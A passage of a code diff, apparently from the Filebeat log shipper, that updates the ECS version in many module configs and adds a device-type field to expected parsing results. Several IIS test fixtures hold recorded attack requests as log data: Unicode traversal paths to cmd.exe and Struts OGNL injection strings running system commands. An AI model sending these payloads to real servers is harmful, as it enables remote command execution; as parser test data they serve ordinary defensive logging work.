+++ b/filebeat/module/apache/access/config/access.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/apache/access/test/test-vhost.log-expected.json b/filebeat/module/apache/access/test/test-vhost.log-expected.json index b332788ad2b..2b0bb3cd06c 100644 --- a/filebeat/module/apache/access/test/test-vhost.log-expected.json +++ b/filebeat/module/apache/access/test/test-vhost.log-expected.json @@ -20,6 +20,7 @@ "url.original": "/hello", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", diff --git a/filebeat/module/apache/access/test/test.log-expected.json b/filebeat/module/apache/access/test/test.log-expected.json index ebe88847586..6d49efee866 100644 --- a/filebeat/module/apache/access/test/test.log-expected.json +++ b/filebeat/module/apache/access/test/test.log-expected.json @@ -40,6 +40,7 @@ "url.original": "/hello", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -84,6 +85,7 @@ "url.original": "/stringpatch", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", 
@@ -112,6 +114,7 @@ "url.original": "/status", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -137,6 +140,7 @@ "source.ip": "127.0.0.1", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "-" } diff --git a/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json b/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json index e9680e5b7fb..9bdfab36818 100644 --- a/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json +++ b/filebeat/module/apache/access/test/ubuntu-2.2.22.log-expected.json @@ -20,6 +20,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Wget", "user_agent.original": "Wget/1.13.4 (linux-gnu)", "user_agent.os.name": "Linux", @@ -46,6 +47,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -74,6 +76,7 @@ "url.original": "/favicon.ico", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", 
@@ -102,6 +105,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -130,6 +134,7 @@ "url.original": "/favicon.ico", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -158,6 +163,7 @@ "url.original": "/favicon.ico", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -186,6 +192,7 @@ "url.original": "/test", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -214,6 +221,7 @@ "url.original": "/hello", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", @@ -242,6 +250,7 @@ "url.original": "/crap", "user.name": "-", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", "user_agent.os.full": "Mac OS X 10.12", 
diff --git a/filebeat/module/apache/error/config/error.yml b/filebeat/module/apache/error/config/error.yml index 2bd2a117d1c..a33bd9b635e 100644 --- a/filebeat/module/apache/error/config/error.yml +++ b/filebeat/module/apache/error/config/error.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/auditd/log/config/log.yml b/filebeat/module/auditd/log/config/log.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/auditd/log/config/log.yml +++ b/filebeat/module/auditd/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/elasticsearch/audit/config/audit.yml b/filebeat/module/elasticsearch/audit/config/audit.yml index bdf1cf8696e..8df82146c8e 100644 --- a/filebeat/module/elasticsearch/audit/config/audit.yml +++ b/filebeat/module/elasticsearch/audit/config/audit.yml @@ -10,7 +10,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - if: regexp: message: "^{" diff --git a/filebeat/module/elasticsearch/deprecation/config/log.yml b/filebeat/module/elasticsearch/deprecation/config/log.yml index 62e291e30de..5381e6a5674 100644 --- a/filebeat/module/elasticsearch/deprecation/config/log.yml +++ b/filebeat/module/elasticsearch/deprecation/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/elasticsearch/gc/config/gc.yml b/filebeat/module/elasticsearch/gc/config/gc.yml index ba6d4dceefd..d52a54792c0 100644 --- a/filebeat/module/elasticsearch/gc/config/gc.yml +++ b/filebeat/module/elasticsearch/gc/config/gc.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/filebeat/module/elasticsearch/server/config/log.yml b/filebeat/module/elasticsearch/server/config/log.yml index 1723c9c86b6..3edfd48e9eb 100644 --- a/filebeat/module/elasticsearch/server/config/log.yml +++ b/filebeat/module/elasticsearch/server/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml index 6b57b280a25..c3c709d8c4b 100644 --- a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml +++ b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/haproxy/log/config/file.yml b/filebeat/module/haproxy/log/config/file.yml index 1fc1e5a33c7..759bd4ed456 100644 --- a/filebeat/module/haproxy/log/config/file.yml +++ b/filebeat/module/haproxy/log/config/file.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/haproxy/log/config/syslog.yml b/filebeat/module/haproxy/log/config/syslog.yml index cf755c53a96..8634a5b6283 100644 --- a/filebeat/module/haproxy/log/config/syslog.yml +++ b/filebeat/module/haproxy/log/config/syslog.yml @@ -4,6 +4,6 @@ protocol.udp: processors: - add_locale: ~ - add_fields: - target: '' + target: "" fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/icinga/debug/config/debug.yml b/filebeat/module/icinga/debug/config/debug.yml index 34bdcef7fa8..8c11e01e7ea 100644 --- a/filebeat/module/icinga/debug/config/debug.yml +++ b/filebeat/module/icinga/debug/config/debug.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/filebeat/module/icinga/main/config/main.yml b/filebeat/module/icinga/main/config/main.yml index 34bdcef7fa8..8c11e01e7ea 100644 --- a/filebeat/module/icinga/main/config/main.yml +++ b/filebeat/module/icinga/main/config/main.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/icinga/startup/config/startup.yml b/filebeat/module/icinga/startup/config/startup.yml index 81a45be7e91..39bf7703cc4 100644 --- a/filebeat/module/icinga/startup/config/startup.yml +++ b/filebeat/module/icinga/startup/config/startup.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/iis/access/config/iis-access.yml b/filebeat/module/iis/access/config/iis-access.yml index aadbabb01ed..40e87d30ee0 100644 --- a/filebeat/module/iis/access/config/iis-access.yml +++ b/filebeat/module/iis/access/config/iis-access.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json b/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json index 64ad587bb8b..7b21735e4d4 100644 --- a/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json +++ b/filebeat/module/iis/access/test/test-iis-7.2.log-expected.json @@ -33,6 +33,7 @@ "url.path": "/pbserver/..\u00c0\u00af..\u00c0\u00af..\u00c0\u00af..\u00c0\u00af..\u00c0\u00af../winnt/system32/cmd.exe", "url.query": "/c+dir+c:\\+/OG", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", 
@@ -74,6 +75,7 @@ "url.path": "/pbserver/..\u00c1\u00c1..\u00c1\u00c1..\u00c1\u00c1..\u00c1\u00c1..\u00c1\u00c1../winnt/system32/cmd.exe", "url.query": "/c+dir+c:\\+/OG", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -114,6 +116,7 @@ "source.ip": "10.50.6.188", "url.path": "/Director", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -154,6 +157,7 @@ "source.ip": "10.50.6.188", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -195,6 +199,7 @@ "url.path": "/pbserver/..\u00c1\u0153..\u00c1\u0153..\u00c1\u0153..\u00c1\u0153..\u00c1\u0153../winnt/system32/cmd.exe", "url.query": "/c+dir+c:\\+/OG", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", diff --git a/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json b/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json index 95210536925..c8e10677d3d 100644 --- a/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json +++ b/filebeat/module/iis/access/test/test-iis-7.5.log-expected.json 
@@ -32,6 +32,7 @@ "source.ip": "10.100.118.31", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR[ 2.0.50727](tel: 2050727); .NET CLR 3.0.30729)", "user_agent.os.full": "Windows 8.1", diff --git a/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json b/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json index c3f4a4932da..c3c1a14a05e 100644 --- a/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json +++ b/filebeat/module/iis/access/test/test-ipv6zone.log-expected.json @@ -38,6 +38,7 @@ "source.ip": "::1", "url.path": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", diff --git a/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json b/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json index 565bdfca17d..fa825003cd4 100644 --- a/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json +++ b/filebeat/module/iis/access/test/test-x-forward-for-extended.log-expected.json @@ -40,6 +40,7 @@ "source.ip": "10.24.136.240", "url.path": "/favicon.ico", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0", "user_agent.os.full": "Windows 10", 
@@ -87,6 +88,7 @@ "source.ip": "10.24.136.240", "url.path": "/robots.txt", "user_agent.device.name": "Spider", + "user_agent.device.type": "Robot", "user_agent.name": "Twitterbot", "user_agent.original": "Twitterbot/1.0", "user_agent.version": "1.0" @@ -134,6 +136,7 @@ "url.path": "/app_data/cache/9/e/1/c/3/7/9e1c37a203a2a306e8f5d4df1bddb1109dd42e57.jpg", "url.query": "width=35&height=38&mode=crop", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Edge", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362", "user_agent.os.full": "Windows 10", @@ -184,6 +187,7 @@ "url.path": "/app_data/cache/f/b/7/1/2/7/fb71277260ae26a108c3608ce1a62474a55b2556.jpg", "url.query": "width=75&height=40&mode=crop", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Edge", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362", "user_agent.os.full": "Windows 10", @@ -234,6 +238,7 @@ "url.path": "/Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png", "url.query": "width=60&height=20&mode=crop", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Mobile Safari", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1", "user_agent.os.full": "iOS 13.7", 
@@ -284,6 +289,7 @@ "url.path": "/Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg", "url.query": "width=60&height=20&mode=crop", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Mobile Safari", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1", "user_agent.os.full": "iOS 13.7", diff --git a/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json b/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json index 4d8ace5a7fb..7acf700509e 100644 --- a/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json +++ b/filebeat/module/iis/access/test/test-x-forward-for.log-expected.json @@ -34,6 +34,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -76,6 +77,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", 
@@ -118,6 +120,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -161,6 +164,7 @@ "url.path": "/Production-UI/data/finance/legacy/GLAPAprvMaster", "url.query": "$filter=BatchId%20eq%20%27FY21HSNG0820%27&$orderby=Subsys,Ref&$skip=0&$top=20", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -204,6 +208,7 @@ "url.path": "/Production-UI/data/finance/legacy/GLATrnsDetail", "url.query": "$filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27&$orderby=RecNo&$skip=0&$top=20", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -246,6 +251,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", 
@@ -288,6 +294,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -330,6 +337,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", @@ -372,6 +380,7 @@ "source.ip": "192.168.7.63", "url.path": "/Production-UI/api/finance/legacy/documents/attachDoc", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "user_agent.os.full": "Windows 10", diff --git a/filebeat/module/iis/access/test/test.log-expected.json b/filebeat/module/iis/access/test/test.log-expected.json index 786333c1379..59a6d13d4bc 100644 --- a/filebeat/module/iis/access/test/test.log-expected.json +++ b/filebeat/module/iis/access/test/test.log-expected.json @@ -43,6 +43,7 @@ "url.path": "/", "url.query": "q=100", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0", "user_agent.os.full": "Windows 7", 
@@ -80,6 +81,7 @@ "source.ip": "127.0.0.1", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0", "user_agent.os.full": "Windows 7", @@ -136,6 +138,7 @@ "source.ip": "85.181.35.98", "url.path": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", @@ -177,6 +180,7 @@ "url.path": "/", "url.query": "redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.getSession().getServletContext().getRealPath('/'),%23resp.println(%23webroot),%23resp.flush(),%23resp.close()}", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", @@ -217,6 +221,7 @@ "source.ip": "10.50.6.188", "url.path": "/${#context['xwork.MethodAccessor.denyMethodExecution']=!(#_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()}.action", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "IE", "user_agent.original": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)", "user_agent.os.full": "Windows XP", diff --git a/filebeat/module/iis/error/config/iis-error.yml b/filebeat/module/iis/error/config/iis-error.yml index aadbabb01ed..40e87d30ee0 100644 --- a/filebeat/module/iis/error/config/iis-error.yml +++ b/filebeat/module/iis/error/config/iis-error.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/filebeat/module/kafka/log/config/log.yml b/filebeat/module/kafka/log/config/log.yml index 87f38b44128..94c705c484a 100644 --- a/filebeat/module/kafka/log/config/log.yml +++ b/filebeat/module/kafka/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/kibana/audit/config/audit.yml b/filebeat/module/kibana/audit/config/audit.yml index 3806e65aaba..bac90dfba5b 100644 --- a/filebeat/module/kibana/audit/config/audit.yml +++ b/filebeat/module/kibana/audit/config/audit.yml @@ -10,7 +10,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 0.0.0 + ecs.version: 1.9.0 - decode_json_fields: fields: [message] target: kibana._audit_temp diff --git a/filebeat/module/kibana/log/config/log.yml b/filebeat/module/kibana/log/config/log.yml index a1c113f53a8..6bc146d18a8 100644 --- a/filebeat/module/kibana/log/config/log.yml +++ b/filebeat/module/kibana/log/config/log.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/logstash/log/config/log.yml b/filebeat/module/logstash/log/config/log.yml index a90a5be8d96..79154da3464 100644 --- a/filebeat/module/logstash/log/config/log.yml +++ b/filebeat/module/logstash/log/config/log.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/logstash/slowlog/config/slowlog.yml b/filebeat/module/logstash/slowlog/config/slowlog.yml index f391047702d..4694e21b679 100644 --- a/filebeat/module/logstash/slowlog/config/slowlog.yml +++ b/filebeat/module/logstash/slowlog/config/slowlog.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/mongodb/log/config/log.yml b/filebeat/module/mongodb/log/config/log.yml index 2db4213af7b..100ae74fadc 100644 
--- a/filebeat/module/mongodb/log/config/log.yml +++ b/filebeat/module/mongodb/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/mysql/error/config/error.yml b/filebeat/module/mysql/error/config/error.yml index 2bf22a084ec..03eb867033b 100644 --- a/filebeat/module/mysql/error/config/error.yml +++ b/filebeat/module/mysql/error/config/error.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/mysql/slowlog/config/slowlog.yml b/filebeat/module/mysql/slowlog/config/slowlog.yml index 6b83b522706..c10dd58a561 100644 --- a/filebeat/module/mysql/slowlog/config/slowlog.yml +++ b/filebeat/module/mysql/slowlog/config/slowlog.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nats/log/config/log.yml b/filebeat/module/nats/log/config/log.yml index 2db4213af7b..100ae74fadc 100644 --- a/filebeat/module/nats/log/config/log.yml +++ b/filebeat/module/nats/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/access/config/nginx-access.yml b/filebeat/module/nginx/access/config/nginx-access.yml index 2bd2a117d1c..a33bd9b635e 100644 --- a/filebeat/module/nginx/access/config/nginx-access.yml +++ b/filebeat/module/nginx/access/config/nginx-access.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/access/test/access.log-expected.json b/filebeat/module/nginx/access/test/access.log-expected.json index 7981a316c95..a54a5d52ebf 100644 --- a/filebeat/module/nginx/access/test/access.log-expected.json +++ b/filebeat/module/nginx/access/test/access.log-expected.json 
@@ -40,6 +40,7 @@ "source.ip": "77.179.66.156", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -89,6 +90,7 @@ "source.ip": "77.179.66.156", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -137,6 +139,7 @@ "source.ip": "77.179.66.156", "url.original": "/adsasd", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -185,6 +188,7 @@ "source.ip": "77.179.66.156", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -234,6 +238,7 @@ "source.ip": "77.179.66.156", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", 